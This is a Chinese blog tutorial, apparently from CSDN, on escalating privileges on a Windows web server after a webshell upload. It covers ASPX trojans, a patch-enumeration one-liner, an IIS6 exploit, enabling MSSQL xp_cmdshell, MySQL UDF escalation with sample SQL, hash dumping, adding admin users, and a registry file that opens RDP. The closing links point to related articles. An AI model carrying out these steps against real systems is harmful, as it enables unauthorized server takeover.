windows php提高权限,权限提升

最新推荐文章于 2023-10-20 21:48:50 发布
最新推荐文章于 2023-10-20 21:48:50 发布
阅读量451 收藏
点赞数
文章标签: windows php提高权限

首先上传一个webshell网站上

5bd986a714c6

查看里面的内容,以及shell功能。

5bd986a714c6

由于这个shell本身自带的cmd命令不能运行,而且上传cmd不成功

5bd986a714c6

有新建文件的功能

然后上传一个aspx的马,这个木马的权限。比asp的权限高。

但是前提你必须要知道,那个目录有可读可写可执行的权限。

5bd986a714c6

5bd986a714c6

进入aspx的木马中。

发现这个马中的cmd也没有权限。

那就上传一个cmd。

然后在asp马上执行,一下

systeminfo>C:\Windows\Temp\temp.txt&(for %i in (KB3124280

KB3143141 KB3134228 KB3079904 KB3077657 KB3124280

KB3045171 KB2829361 KB3000061 KB2850851 KB2707511

KB970483 KB2124261 KB2271195) do @type C:\Windows

\Temp\temp.txt|@find /i "%i"|| @echo %i Not Installed!)&del /f /

q /a C:\Windows\Temp\temp.txt

查看补丁的补丁编号。

5bd986a714c6

这个时候可以上传一个利用补丁漏洞的shell,IIS6

5bd986a714c6

创建一个用户。

5bd986a714c6

把他放到admin用户组中

5bd986a714c6

启动用户。

5bd986a714c6

查看用户信息。

5bd986a714c6

已经是admin用户了。

然后可以远程连接了。

5bd986a714c6

MSSQL权限提升

在上传的aspx木马上,使用database连接

5bd986a714c6

使用mssql,以及下面的回显信息表示成功。

5bd986a714c6

使用XP_cmdshelll exec

5bd986a714c6

一般数据库都是禁用这些功能的。

5bd986a714c6

利用Add xp_cmdshell(SQL2005)开启xp_cmdshell服务。

5bd986a714c6

接下来我么可以创建一个用户。

5bd986a714c6

把用户添加到,admin组中。

5bd986a714c6

完成远程连接

5bd986a714c6

而且我们也可以,上传一个gethash的exe获取,账户密码hash。

5bd986a714c6

利用UDF提权

什么是UDf

UDF顾名思义,就是User defined Function,用户定义函数。我们知道,MySQL本身支持很多内建的函数,此外还可以通过创建存储方法来定义函数。UDF为用户提供了一种更高效的方式来创建函数。

UDF与普通函数类似,有参数,也有输出。分为两种类型:单次调用型和聚集函数。前者能够针对每一行数据进行处理,后者则用于处理Group By这样的情况

使用UDF的优点

1)UDF的兼容性很好,这得益于MySQL的UDF基本上没有变动

2)比存储方法具有更高的执行效率,并支持聚集函数

3)相比修改代码增加函数,更加方便简单

UDF提权利用过程

在上传的shell中,没有操作系统的漏洞,可以采用mysql的UDF提权。

导入udf.dll文件到服务器指定目录

1.档mysql版本大于5.1 需要把udf.php文件导入到mysql安装目录下/lib/plugin_dir目录(默认目录不存在,创建目录,查看select @@basedir)

2.mysql版本小于5.1 udf.php导入到c:\windows\目录

使用sql语句创建功能函数

CREATE FUNCTION shell RETURNS STRING SONAME 'udf.dll'

执行mysql语句调用新创建的函数

select shell(‘cmd','whoami')

删除创建的函数

drop function shell;

1.利用大马自带的mysql执行功能查看版本信息。

5bd986a714c6

而且这个测试环境也可以使用操作系统提权

5bd986a714c6

2.上传一个udf.php用来协助我们更方便的实现上传udf.dll上传到服务器上

5bd986a714c6

生成一个shell,然后调用系统命令,创建一个用户并把用户添加到管路员组。

5bd986a714c6

5bd986a714c6

5bd986a714c6

完成添加用户到admin的功能。

5bd986a714c6

远程连接(远程连接的前提功能是服务器开启3306端口)

如果没有开启我们可通过创建一个.reg文件来开启。

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control

\Terminal Server]

"fDenyTSConnections"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control

\Terminal Server\Wds\rdpwd\Tds\tcp]

"PortNumber"=dword:00000D3D

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control

\Terminal Server\WinStations\RDP-Tcp]

"PortNumber"=dword:00000D3D

regedit /s C:\3389.reg

5bd986a714c6

Rachel G33
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
权限提升
m0_65332604的博客
04-06 1230
提权,顾名思义就是提高自己在服务器中的权限,就比如在Windows中,你本身登陆的用户是Guest,通过提权后,就会变成超级管理员,拥有了管理Windows的所有权限。以下是常见几种提权方式: 1.Bypass UAC UAC介绍 UAC(UserAccount Control,用户账户控制)简言之就是在Vista及更高版本中通过弹框进一步让用户确认是否授权当前可执行文件来达到阻止恶意程序的目的。 为了远程执行目标的exe或者bat可执行文件绕过此安全机制,以此叫BypassUAC(不进行弹窗直接运
权限提升.
weixin_67348649的博客
04-07 350
提权,顾名思义就是提高自己在服务器中的权限,就比如在Windows中,你本身登陆的用户是Guest,通过提权后,就会变成超级管理员,拥有了管理Windows的所有权限。以下是常见几种提权方式: 1.Bypass UAC UAC介绍 UAC(UserAccount Control,用户账户控制)简言之就是在Vista及更高版本中通过弹框进一步让用户确认是否授权当前可执行文件来达到阻止恶意程序的目的。 为了远程执行目标的exe或者bat可执行文件绕过此安全机制,以此叫BypassUAC(不进行.
初涉内网,提权那些事
xxxxxibdrgn的博客
11-03 822
对于内核提权就写到这啦 整体看下来应该都会有一个比较清楚的认知吧 不懂的话多看几遍 相对来说是写的比较详细的了。关于内网还有很多需要学习的知识 像提权后的权限维持、横向移动、后渗透、痕迹清理、不同平台的不同方式提权、以及进阶的域渗透。后期有空了会更新有关内容的文章。学海无涯,希望大家每天都能学到新知识提升自己,学到的东西可不要做非法的事哈!!!!个人博客链接: https://webgotd.com。
cmd 执行php命令无效,php无法执行cmd命令行怎么办
weixin_39941620的博客
03-10 1600
php无法执行cmd命令行怎么办发布时间:2020-07-03 15:45:52来源:亿速云阅读:150作者:Leahphp无法执行cmd命令行怎么办?针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。php不支持执行cmd命令行是因为你没有关闭php配置文件中的安全模式。在php.ini文件中配置safe_mode参数支持命令执行的方...
windows php目录权限,详细介绍Windows Server 2008设定目录权限的方法(图)
weixin_36354131的博客
03-16 428
问题概述:Windows Server 2008的管理员可以依据安全性的需求,指定NTFS的权限给用户账户或组账户。通常只有系统管理员、文件或目录的所有者或对文件、目录拥有完全控制权限的使用者可以更改NTFS文件或目录的权限。指定标准权限时可以针对每个权限,设置其为“允许”或“拒绝”执行该项权限。解决步骤:以Windows Server 2008为例,目录的标准权限设置步骤如下:1、 选择“开始”...
php后台提权,phpwind命令执行getshell(后台)
weixin_36482670的博客
03-10 635
### 简要描述:官网下载最新版### 详细说明:v9.0.1搭建好,登陆[](https://images.seebug.org/upload/201602/12102252ce0e0a04f54d200949718aa2bd67d7cc.png)在门户里选择页面管理,新增模块。自定义html[](https://images.seebug.org/upload/201602/12102352b...
xm20.rar_Windows编程_PHP_
08-11
《寻梦书库管理系统》是基于Windows平台,利用PHP编程语言开发的一款图书管理软件。...通过深入理解Windows编程和PHP编程技术,我们可以更好地理解和利用这个系统,进一步提升图书管理工作的效率和质量。
安装windowsphp7+nginx+fastcgi
10-17
PHP7相比之前的版本有着显著的性能提升,错误处理更加友好,且引入了新的语法特性,如返回类型声明和空值合并运算符等。 其次,**Nginx**是一款高性能的HTTP和反向代理服务器,同时也是邮件协议代理服务器。Nginx以...
PHPWind_UTF8_7.3.2.zip_Windows编程_PHP_
08-12
3. **功能丰富**:内置多种功能模块,如会员管理、发帖回帖、论坛活动、积分系统、用户组权限控制等,为用户提供全方位的社区服务。 4. **SEO友好**:PHPWind对搜索引擎优化(SEO)做了深入考虑,提供自定义URL结构...
PHPWind提权工具
11-07
PHPWind 2.02-3.31E提权工具
PHP实例开发源码—phpMyAdmin For Windows.zip
11-12
通过研究这个Windows版本的phpMyAdmin源码,开发者不仅可以提升PHP和MySQL的技能,还能深入了解Web应用的设计与实现,为今后的项目开发打下坚实的基础。同时,这也有助于理解开源软件的工作原理和社区协作模式。
Windows Server 2012 Iis8 php环境配置方法
09-30
Windows Server 2012 IIS8 PHP环境配置】 Windows Server 2012是微软发布的一款服务器操作系统,相较于其前代Windows Server 2008,它提供了更高的性能和效率。IIS8(Internet Information Services 8.0)是该...
【小白专用24.5.30已验证】windows 11 安装PHP8.3 +Apache2.4
zgscwxd的博客
10-20 5741
windows 11 安装PHP8.2
php获取文件的权限信息(获取权限信息、返回字符串涵义、二进制的转换方式、权限修改)
漏刻有时数据可视化大屏(PHP&ECHARTS智能化开源软件系统)
06-05 983
其中,第一个字符代表文件类型,后面九个字符分别代表文件拥有者、群组及其他人的读写权限,‘r’ 表示只读权限,‘w’ 表示可写权限,‘x’ 表示可执行权限, ‘-’ 表示无某种权限,通过这些字符的组合可以用来表示文件的全部权限信息。-rwxr-xr-x,在Linux 系统中权限是区分用户的,即用户、组用户、其他用户,第一位表示文件的类型,-代表文件,d代表目录,其他每个用户占三个字符,这里-rwxr-xr-x对应如下关系。通过设置文件权限,可以保护文件和目录的安全性,同时也可以控制文件的使用方式。
php设置文件权限问题,使用PHPWindows中设置文件权限
weixin_42125867的博客
03-09 892
The problem only happens when you use PHP to upload a file. When you upload a file, PHP sends the file to a temporary directory on thehard drive (for me it is C:\Windows\Temp) and then copies it over...
php exec dir 无权限,在PHP中使用exec命令时可能出现权限问题
weixin_28933797的博客
03-10 512
我们有一个小型办公室内部网,内置PHP(在Apache服务器上 – 所以WAMP),允许我们在文件服务器上创建项目文件夹.这可以通过使用shell exec xcopy命令和以下开关/ e / k / i / c将一组模板文件夹复制到新位置来实现.我们(公平地)最近升级到运行Windows Server 2008 R2 Standard的新文件服务器.现在,xcopy命令不再适用于PHP.但是,我...
倍加福ENA58IL-R-ProfiNET手册(译文)
最新发布
07-11
本手册描述了配备PROFINET接口的Pepperl+Fuchs绝对旋转编码器如何集成到PROFINET网络中。 本手册适用于以下绝对旋转编码器类型: ■■Exx58N-...PN... ■Exx58N-。。。请注意。。。 ■■ENA58IL-...B17 ■ENA58IL-。。。B17
Windows-XP下-php环境架设.doc
11-30
Windows XP操作系统下搭建PHP环境是一个相对...通过搭建PHP环境,可以实现网站的动态功能,提升用户体验,为Web开发工作提供便利。希望通过本文的指导,读者们可以顺利搭建PHP环境,并运用于实际的Web开发项目中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值